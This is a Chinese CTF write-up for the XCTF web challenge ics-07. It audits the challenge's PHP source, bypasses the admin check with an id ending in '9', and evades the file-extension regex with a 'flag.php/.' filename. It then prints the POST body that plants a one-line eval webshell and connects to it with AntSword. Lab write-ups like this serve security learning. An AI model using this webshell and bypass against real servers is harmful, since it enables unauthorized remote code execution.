【攻防世界CTF | WP】ics-07

最新推荐文章于 2024-03-24 23:04:41 发布
最新推荐文章于 2024-03-24 23:04:41 发布
阅读量2.1k 收藏
点赞数
分类专栏: ctf 文章标签: php 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ethan18/article/details/122760171
版权

【攻防世界CTF | WP】ics-07

题目

在这里插入图片描述

思路

查看界面

打开题目,我们可以看到一个只有项目管理界面可以进行操作的网站,项目管理界面如下

在这里插入图片描述
我们看到有一个源代码链接,点击链接的源代码如下

 <?php
    session_start();

    if (!isset($_GET[page])) {
      show_source(__FILE__);
      die();
    }

    if (isset($_GET[page]) && $_GET[page] != 'index.php') {
      include('flag.php');
    }else {
      header('Location: ?page=flag.php');
    }

    ?>

 <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
            chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
     ?>

 <?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

有三段php代码,分别的含义如下

  • 如果有page变量并且page变量不是‘index.php’,那么include ‘flag.php’这个文件,否则重定向到flag.php
  • 如果有admin的session,也就是对话是admin的会话,可以通过con和file这两个变量的post输入,进行一个对文件的保存,文件内容就是con,名称是file
  • 告诉我们如何获取admin的session

开始操作

获取admin的session

之前的源代码中,我们可以看到,和admin的会话相关的php源代码是这样

<?php
      if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {
        include 'config.php';
        $id = mysql_real_escape_string($_GET[id]);
        $sql="select * from cetc007.user where id='$id'";
        $result = mysql_query($sql);
        $result = mysql_fetch_object($result);
      } else {
        $result = False;
        die();
      }

      if(!$result)die("<br >something wae wrong ! <br>");
      if($result){
        echo "id: ".$result->id."</br>";
        echo "name:".$result->user."</br>";
        $_SESSION['admin'] = True;
      }
     ?>

我们需要一个id变量,这个变量经过float函数返回值不是1,并且最后一个字符要为字符9,这里我们可以直接使用如1b9之类的字符

发现得到了admin的session
在这里插入图片描述

选择方法

我们可以进行sql语句的查询,但我们发现这个sql语句使用的函数是

$id = mysql_real_escape_string($_GET[id]);

代表它其实是会把我们输入的字符进行转义,也就是说会给字符进行转义,也就是像是 \’   \" 这样的转义字符

所以sql注入暂时走不通

我们再看看另一个php代码

 <?php
     if ($_SESSION['admin']) {
       $con = $_POST['con'];
       $file = $_POST['file'];
       $filename = "backup/".$file;

       if(preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)){
          die("Bad file extension");
       }else{
           chdir('uploaded');
           $f = fopen($filename, 'w');
           fwrite($f, $con);
           fclose($f);
       }
     }
?>

在拥有了admin的session后

发现可以通过进行文件名称和文件内容的输入进行文件上传,那我们的方法就很好想了,一句话木马就好了(不会的朋友建议百度一下)

但我们要解决这个正则表达式的问题,我们观察上面那个表达式

preg_match('/.+\.ph(p[3457]?|t|tml)$/i', $filename)

这个正则表达式想要筛选的是以 xxx.php , xxx.php3,xxx.phtml 这一类后缀,并且只想要这样的后缀

所以我们可以选择用 xxx.php/. 这样的手法来进行绕过

实现

我们使用post传输

con=<?php @eval($_POST['cmd']);?>&file=flag.php/.

然后使用蚁剑

在这里插入图片描述
在这里插入图片描述
结束!

ethanyi9
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Web安全攻防世界09 ics-07(XCTF
weixin_42789937的博客
01-29 956
Web安全攻防世界09 ics-07(XCTF),友情提示:攻防世界最近的答题环境不太稳定,我这篇没有做到最后一步...
【愚公系列】2023年06月 攻防世界-Webics-07
时光隧道
06-15 4099
php是一种弱类型语言,意味着在变量的赋值和使用过程中,不需要显式地定义变量的类型。php会根据变量的值自动判断变量的数据类型。floatval是php中的一个内置函数,用于将变量转换为浮点数型数据。如果变量的值不能被转换成数字,则返回0。3.14在这个例子中,$num变量被赋值为字符串"3.14",但在使用floatval函数将其转换为浮点型数据后,$float_num变量中存储的值为3.14。preg_match是php中的一个正则表达式匹配函数,用于检索字符串中的特定模式。
攻防世界WEB】难度五星15分进阶题:ics-07
07-24 570
攻防世界WEB】五星15分
攻防世界----ics-07
qq_44418229的博客
07-26 399
攻防世界---ics-07 分析源码+正则
xctf攻防世界 Web高手进阶区 ics-07
l8947943的博客
01-01 612
1. 进入场景,查看环境 一顿狂点,项目管理可以打开,如图: 看到这个view-source,可以戳进去查看源码,如图: 2. 分析问题 这个题还是很中规中矩的,登录界面随便填写,查看url中的变化 也就是说page和id将会是解题的重要参数。 开始分析代码 <?php if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'); }else {
ctf-all-in-one
01-30
ctf-all-in-one
CTF-misc工具2-CTF-Tools-masterV1.3.7
08-17
CTF-Tools-master是一个专注于密码编码识别与解码的工具,能自动推断密码的编码类型,并进行解码。 适用人群: 该工具主要适用于参加CTF竞赛的选手,以及对密码编码算法感兴趣的信息安全从业人员。 使用场景: 在CTF竞赛...
ctf-2017-release:BSidesSF CTF 2017版本
05-28
ctf-2017 2017 BSidesSF CTF面临的挑战 内置的 , , , , 在本地应对挑战 您可以使用docker在本地运行所有挑战。 docker-compose build && docker-compose up -d 挑战将在http://localhost:PORT提供,基于...
CTF-100题.-天天练习-学习
11-01
CTF-100题.-----------------天天练习------------------学习 100小题,试例练习
PyPI 官网下载 | ctf-q21-empire-tmp-lolol26-2.0.0.tar.gz
01-27
【PyPI 官网下载 | ctf-q21-empire-tmp-lolol26-2.0.0.tar.gz】 PyPI(Python Package Index)是Python编程语言的官方软件包仓库,开发者可以在这里发布自己的Python库,供全球用户下载和使用。"ctf-q21-empire-tmp...
攻防世界 ics-07
CyhDl666的博客
02-24 481
ics-07 hint:工控云管理系统项目管理页面解析漏洞 进入管理页面是个登录窗 左下角有个查看源码 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]) && $_GET[page] != 'index.php') { include('flag.php'.
ics-07CTF
qq_40646572的博客
04-16 2226
审题 打开链接地址显示如下: 点击项目管理链接,转到目标网页 发现页面有一个view-source按钮(一开始没发现可以点击,打开源代码的时候发现,这是一个链接地址。) view_source页面代码如下: 通过代码审计,发现session会话要有admin用户的信息,才可以进行文件上传的操作。 那么首先需要在session会话中获取admin用户的身份,通过下面的代码审计,发现可以利用id 这个参数。 admin身份绕过 首先看到此处的代码,想着能不能使用sql注入的方式绕过,sql注入没能成功.
xctf-web-ics07
zhejichensha_l7l的博客
02-19 157
文章目录瞎分析过程二、使用步骤1.引入库2.读入数据总结 瞎分析 感觉就是道php代码审计+文件上传题目 (可能有错,请各位哥哥姐姐们指点指点) 过程 代码如下(示例): <!DOCTYPE html> <html> <head> <meta charset="utf-8"> <title>cetc7</title> </head> <body> <?php
CTFSHOW-文件包含
Monica的博客
09-12 5717
WEB78 题目: <?php if(isset($_GET['file'])){ $file = $_GET['file']; include($file); }else{ highlight_file(__FILE__); } 知识点:php伪协议 php://filter可以获取指定文件源码。当它与包含函数结合时,php://filter流会被当作php文件执行。所以我们一般对其进行编码,让其不执行。从而导致 任意文件读取。 1、php://input
攻防世界练习题web
果果的csdn
06-12 1127
虽然是考试周,可是实在不想天天刷题,写写CTF,承包一整天的快乐。 工控云管理系统项目管理页面解析漏洞 打开题目,读到源码,进行审计。 <?php if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') { include 'conf...
CTFics-07
最新发布
qq_74263993的博客
03-24 308
利用Linux的一个目录结构特性。我们递归的在1.php文件夹中再创建2.php,访问1.php/2.php/…进入的是1.php文件夹。上传成功可以在http://....../uploaded/backup路径下查看到shell.php已经上传。可以构造id=1x9来满足(x可以是任何字符可以一个或多个)这个状态说明第一个和第三个php代码已经满足。接下来便是用post方法上传木嘛文件了(我这里用的工具是hackbar插件)拿到题就一个地方有响应(项目管理)接着便是用蚁剑连接了密码是cmd。
攻防世界-web-ics-07-从0到1的解题历程writeup
CTF小白的博客
04-17 3360
题目分析 首先拿到题目描述:工控云管理系统项目管理页面解析漏洞 找到题目入口 点击view-source对源码进行审计 if (isset($_GET[page]) && $_GET[page] != 'index.php') {      include('f...
攻防世界web进阶区ics-07详解
hxhxhxhxx的博客
08-07 1483
攻防世界web进阶区ics-07详解题目详解floatvalsubstr 题目 当然又是熟悉的界面,熟悉的ics题目,熟悉的只能点击一个页面 详解 这里进来有一个view-source 点击看看 是一堆代码。我们进行尝试审计 <?php session_start(); if (!isset($_GET[page])) { show_source(__FILE__); die(); } if (isset($_GET[page]
CTF -攻防世界-web高手区-ics-06
aon8069924165211的博客
08-05 1423
打开网址 根据题意点开报表中心(因为其他的点开都一样,不信你试试) 会看见id =1 想到burp爆破id 所以打开burp抓包(不会抓包的百度 或者看我web新手区,有一题就有抓包 我说的很详细) 右击 然后你会发现 会发现id=2333时候length不一样 注意 不要一个个找 length点一下会排序。。。 ok搞定 ...
ctf php绕过<,CTF-攻防世界-Web_php_include(PHP文件包含)
05-13
这是一道经典的 PHP 文件包含漏洞的 CTF 题目。在 PHP 中,当我们使用 include 或 require 语句来引入文件时,如果我们没有对输入进行过滤,就会存在文件包含漏洞。 在这道题目中,我们需要绕过一个筛选器,使得...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值